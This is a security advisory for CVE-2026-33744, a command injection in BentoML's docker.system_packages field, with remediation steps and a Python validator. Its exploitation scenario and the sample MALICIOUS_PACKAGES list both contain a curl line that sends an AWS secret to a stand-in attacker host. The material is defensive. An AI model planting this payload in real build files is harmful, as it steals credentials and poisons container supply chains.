CVE-2026-33744: BentoML: command injection in bentofile.yaml containerize
GHSA-jfjg-vc52-wqvf HIGH CISA: ATTEND
Any team running `bentoml containerize` on untrusted or externally-sourced bentofile.yaml files is exposed to arbitrary command execution at build time — a classic supply-chain injection point in MLOps pipelines. Patch to BentoML 1.4.37 immediately and treat bentofile.yaml with the same scrutiny as Dockerfile or CI/CD scripts. If you cannot patch, block unreviewed bentofile.yaml ingestion in your build pipelines.
What is the risk?
High risk for organizations with collaborative or automated MLOps pipelines where bentofile.yaml originates from shared repositories, model hubs, or external contributors. Exploitation is trivial — no ML expertise required, just knowledge of shell metacharacters. The local attack vector limits opportunistic internet exposure, but CI/CD systems routinely pull and build from external sources, effectively elevating this to a remote-exploitable scenario in practice. Build-time compromise is particularly dangerous because artifacts (container images) propagate downstream before detection.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| bentoml | pip | <= 1.4.36 | 1.4.37 |
Do you run `bentoml containerize` with bentoml 1.4.36 or earlier? You're affected.
What should I do?
5 steps:
1. PATCH: Upgrade BentoML to >=1.4.37 immediately on all build hosts and CI/CD agents.
2. AUDIT: Review all bentofile.yaml files in your repositories for suspicious entries in `docker.system_packages`. Values containing whitespace, semicolons, ampersands, pipes, backticks or `$(...)` are red flags; so is a value starting with `-`, which apt-get would read as an option.
3. GATE: Add a pre-build lint step (grep/regex) that rejects any bentofile.yaml whose `system_packages` values fall outside your distribution's package-name alphabet (for Debian/Ubuntu: lowercase letters, digits, `+`, `-`, `.`, with an optional `=version` pin). A plain "alphanumeric only" rule is simpler but will also reject legitimate names such as `g++` or `libssl-dev`.
4. ISOLATE: Run `bentoml containerize` in ephemeral, network-restricted build environments (no cloud metadata endpoint access, no production credential mounts).
5. DETECT: Alert on unexpected outbound connections or file writes during Docker build phases in your SIEM/build logging.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2026-33744?
CVE-2026-33744 is a command injection in BentoML before 1.4.37: values in the `docker.system_packages` field of bentofile.yaml are interpolated directly into Dockerfile `RUN` commands without sanitization, so a malicious bentofile.yaml executes arbitrary commands on the build host or in the build container when `bentoml containerize` runs. Because `system_packages` is semantically a list of package names, users do not expect it to be interpreted as shell. Patch to 1.4.37 and treat bentofile.yaml with the same scrutiny as a Dockerfile or CI/CD script.
Is CVE-2026-33744 actively exploited?
No confirmed active exploitation of CVE-2026-33744 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-33744?
1. PATCH: Upgrade BentoML to >=1.4.37 immediately on all build hosts and CI/CD agents. 2. AUDIT: Review all bentofile.yaml files in your repositories for suspicious entries in `docker.system_packages`; values containing whitespace, semicolons, ampersands, pipes, backticks, `$(...)` or a leading `-` are red flags. 3. GATE: Add a pre-build lint step (grep/regex) that rejects any bentofile.yaml whose `system_packages` values fall outside your distribution's package-name alphabet (for Debian/Ubuntu: lowercase letters, digits, `+`, `-`, `.`, optional `=version`). 4. ISOLATE: Run `bentoml containerize` in ephemeral, network-restricted build environments (no cloud metadata endpoint access, no production credential mounts). 5. DETECT: Alert on unexpected outbound connections or file writes during Docker build phases in your SIEM/build logging.
What systems are affected by CVE-2026-33744?
This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps build pipelines, container registries, training pipelines.
What is the CVSS score for CVE-2026-33744?
CVE-2026-33744 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.01%.
Technical Details
NVD Description
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages` is semantically a list of OS package names (data), users do not expect values to be interpreted as shell commands. A malicious `bentofile.yaml` achieves arbitrary command execution during `bentoml containerize` / `docker build`. Version 1.4.37 fixes the issue.
Exploitation Scenario
A threat actor targeting an ML engineering team submits a pull request to an open-source BentoML model repository, modifying bentofile.yaml to include a malicious system_packages entry such as `curl http://attacker.com/exfil?k=$(cat /run/secrets/aws_key)`. When a developer or CI/CD pipeline runs `bentoml containerize` to build the model's serving container — a routine step before deployment — the injected command executes during the Docker RUN layer, exfiltrating build secrets or installing a persistent backdoor into the resulting container image. The compromised image is then pushed to the container registry and deployed to production model serving infrastructure.
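To make the mechanism in the NVD description and the AUDIT/GATE steps above concrete, here is an added example; it is not BentoML's own Dockerfile template and is not part of the original advisory. `render_run_vulnerable` models the pre-1.4.37 behaviour the NVD text describes (values joined straight into a `RUN` line), `validate_system_packages` is the pre-build gate, `render_run_quoted` shows what shell-quoting alone buys, and `render_run_hardened` gates and then quotes. The regex, the `RUN` prefix, the function names and the two sample `docker.system_packages` lists (one reusing the exfiltration payload from the scenario above) are assumptions constructed for the demonstration; the real BentoML template and apt-get invocation may differ.

```python
"""Added example for CVE-2026-33744: how unsanitized docker.system_packages
values reach a Dockerfile RUN line, and a pre-build gate that rejects them.

Models the behaviour given in the NVD description; this is NOT BentoML's own
Dockerfile template. The regex, RUN prefix, function names and sample inputs
are assumptions made for the demonstration.
"""
import re
import shlex

# Assumption: Debian/Ubuntu package-name alphabet (lowercase letters, digits,
# '+', '-', '.', at least two characters, first one alphanumeric) with an
# optional '=<version>' pin. Shell metacharacters (';', '&', '|', '`', '$',
# whitespace) and a leading '-' (apt-get option injection) are all outside it.
PACKAGE_RE = re.compile(r"^[a-z0-9][a-z0-9+.-]+(=[A-Za-z0-9.:~+-]+)?$")

# Assumed shape of the generated line; the real template may differ.
APT_PREFIX = "RUN apt-get update && apt-get install -y "


def validate_system_packages(packages):
    """Return the offending entries; an empty list means the list passes the gate."""
    return [p for p in packages
            if not isinstance(p, str) or not PACKAGE_RE.fullmatch(p)]


def render_run_vulnerable(packages):
    """Pre-1.4.37 pattern per the NVD text: values joined straight into RUN.
    Docker hands a shell-form RUN string to /bin/sh -c, so ';', '$(...)' etc.
    are executed during `docker build`."""
    return APT_PREFIX + " ".join(packages)


def render_run_quoted(packages):
    """Quoting alone: each value becomes one literal argv entry for apt-get.
    A payload still lands in the Dockerfile, but as a bogus package name that
    makes apt-get fail, not as a command."""
    return APT_PREFIX + " ".join(shlex.quote(p) for p in packages)


def render_run_hardened(packages):
    """Gate first, then quote: anything outside the package alphabet fails the
    build before a Dockerfile is written; quoting is defence in depth."""
    bad = validate_system_packages(packages)
    if bad:
        raise ValueError(f"rejected docker.system_packages entries: {bad!r}")
    return render_run_quoted(packages)


# Constructed samples: the parsed `docker.system_packages` lists of two
# hypothetical bentofile.yaml files. The first reuses the exfiltration payload
# from the scenario above; the second is a benign list that must keep working.
MALICIOUS_PACKAGES = [
    "libgomp1",
    "; curl http://attacker.com/exfil?k=$(cat /run/secrets/aws_key) ;",
]
CLEAN_PACKAGES = ["libgomp1", "curl=7.88.1-10+deb12u5", "g++"]


if __name__ == "__main__":
    print("vulnerable:", render_run_vulnerable(MALICIOUS_PACKAGES))
    print("quoted:    ", render_run_quoted(MALICIOUS_PACKAGES))
    print("rejected:  ", validate_system_packages(MALICIOUS_PACKAGES))
    print("hardened:  ", render_run_hardened(CLEAN_PACKAGES))
```

In a CI gate you would load the file with `yaml.safe_load` and pass `data["docker"]["system_packages"]` to `validate_system_packages`, failing the job on a non-empty result. The regex covers only `docker.system_packages`, the field this advisory names; bentofile fields that are executable by design (`docker.setup_script`, `docker.dockerfile_template`) need code review, not a character whitelist.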
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Related Vulnerabilities
| CVE | CVSS | Title | Relation |
|---|---|---|---|
| CVE-2025-54381 | 9.9 | BentoML: unauthenticated SSRF via file upload URLs | Same package: bentoml |
| CVE-2025-27520 | 9.8 | BentoML: unauthenticated RCE via insecure deserialization | Same package: bentoml |
| CVE-2025-32375 | 9.8 | BentoML: RCE via insecure deserialization in runner | Same package: bentoml |
| CVE-2024-9070 | 9.8 | BentoML: unauthenticated RCE via runner deserialization | Same package: bentoml |
| CVE-2026-35044 | 8.8 | BentoML: malicious bento archive RCE via Jinja2 SSTI | Same package: bentoml |